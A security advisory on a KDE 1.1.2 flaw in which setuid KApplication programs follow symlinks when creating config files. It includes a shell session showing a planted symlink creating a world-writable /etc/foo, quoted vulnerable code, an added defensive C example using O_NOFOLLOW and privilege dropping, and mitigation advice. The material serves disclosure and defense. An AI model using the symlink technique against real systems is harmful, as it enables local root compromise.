COMMAND
KDE KApplication {} configfile
SYSTEMS AFFECTED
KDE 1.1.2 (SuSE 6.4, others?)
PROBLEM
Sebastian (TESO Security Advisory) found the following. A bug in
KDE's configuration-file management has been discovered. Because
the KApplication class creates configuration files insecurely,
local users can create arbitrary files when running setuid-root
KDE programs. This can result in a complete compromise of the
system. The vulnerability is present at least in KDE 1.1.2.
All tests were performed on a standard SuSE 6.4 installation.
bash-2.03$ nl /tmp/a.out.cc
1 #include <string.h>
2 #include <stdlib.h>
3 #include <stdio.h>
4 #include <kapp.h>
5 int main(int argc, char **argv)
6 {
7 KApplication *base = new KApplication(argc, argv);
8 base->exec();
9 return 0;
10 }
11
bash-2.03$ ls -la /etc/foo
ls: /etc/foo: No such file or directory
bash-2.04$ ln -s /etc/foo ~/.kde/share/config/a.outrc
bash-2.03$ ls -la /tmp/a.out
-rwsr-sr-x 1 root root 19450 May 28 14:14 /tmp/a.out
bash-2.03$ /tmp/a.out
^C
bash-2.03$ ls -la /etc/foo
-rw-rw-rw- 1 stealth 500 0 May 28 14:26 /etc/foo
bash-2.03$
(Output formatted to improve readability).
An attacker may gain local root access on a system where a
vulnerable KDE distribution is installed. Because KDE is
GUI-based, it may be difficult for an attacker to obtain a root
shell on a remote system; however, the attacker could set the
DISPLAY environment variable to redirect the output to one of his
own machines. A vulnerable system must have at least one setuid
program installed that uses the KApplication class; ktvision and
ktuner are examples of such programs.
Obviously, KDE does not check for symlinks when creating
configuration files. This can result in arbitrary file creation
or in changing the permissions (chmod) of any file. We assume the
bug is within the KApplication::init() function:
...
// now for the local app config file
QString aConfigName = KApplication::localkdedir();
aConfigName += "/share/config/";
aConfigName += aAppName;
aConfigName += "rc";
QFile aConfigFile( aConfigName );
...
This instantiation probably creates the file. However, Teso hasn't
checked QFile {} further.
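As an added example (not from the advisory and not KDE code), here is how a setuid program can open a per-user rc file so that a planted symlink is refused: O_NOFOLLOW on the final component, a 0600 mode instead of the 0666 seen above, an fstat ownership check, and dropping to the real uid first. The demo directory, file names and the "etc-foo" stand-in for /etc/foo are constructed; it assumes a Linux/POSIX system where open() honours O_NOFOLLOW.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>
/* Open (creating if absent) a per-user "<app>rc" file without following a
 * symlink as the final path component: O_NOFOLLOW makes open() fail with
 * ELOOP on a symlink even with O_CREAT, so a planted a.outrc -> /etc/foo
 * link never creates /etc/foo. Mode is 0600, not the 0666 in the advisory's
 * ls output, and fstat() confirms a regular file owned by the real user. */
int open_user_config(const char *path, uid_t owner)
{
    int fd = open(path, O_RDWR | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) < 0 || !S_ISREG(st.st_mode) || st.st_uid != owner) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}
/* Constructed demo in a private temp dir: an rc-named symlink must be refused
 * and its target left uncreated, while a plain rc name is created normally.
 * Returns 0 when both hold, 1 otherwise. */
int run_demo(void)
{
    char dir[] = "/tmp/kderc-demo-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 1;
    char target[256], link_rc[256], plain_rc[256];
    snprintf(target, sizeof target, "%s/etc-foo", dir); /* stands in for /etc/foo */
    snprintf(link_rc, sizeof link_rc, "%s/a.outrc", dir);
    snprintf(plain_rc, sizeof plain_rc, "%s/ktunerrc", dir);
    int ok = 0;
    /* A setuid program drops to the real uid before touching the user's files. */
    if (seteuid(getuid()) == 0 && symlink(target, link_rc) == 0) {
        int bad = open_user_config(link_rc, getuid());   /* expected: -1 (ELOOP) */
        int good = open_user_config(plain_rc, getuid()); /* expected: fd >= 0 */
        ok = (bad < 0 && good >= 0 && access(target, F_OK) != 0);
        if (good >= 0) close(good);
    }
    unlink(plain_rc); unlink(link_rc); unlink(target); rmdir(dir);
    return ok ? 0 : 1;
}
```

O_NOFOLLOW only protects the last path component; a symlinked parent directory under ~/.kde is still followed, which is why dropping privileges before touching the home directory matters more than the flag.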
The bug discovery and the demonstration programs are due to
Sebastian "Stealth" Krahmer. Further checking on different
distributions has been done by Scut.
Teso created a working demonstration program to exploit the
vulnerability. The exploit is available from
http://teso.scene.at/ or https://teso.scene.at/
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
SOLUTION
Do not run KDE applications setuid or setgid. The KDE developers
have been informed, and a patch should be made available soon.
Upgrade as promptly as possible.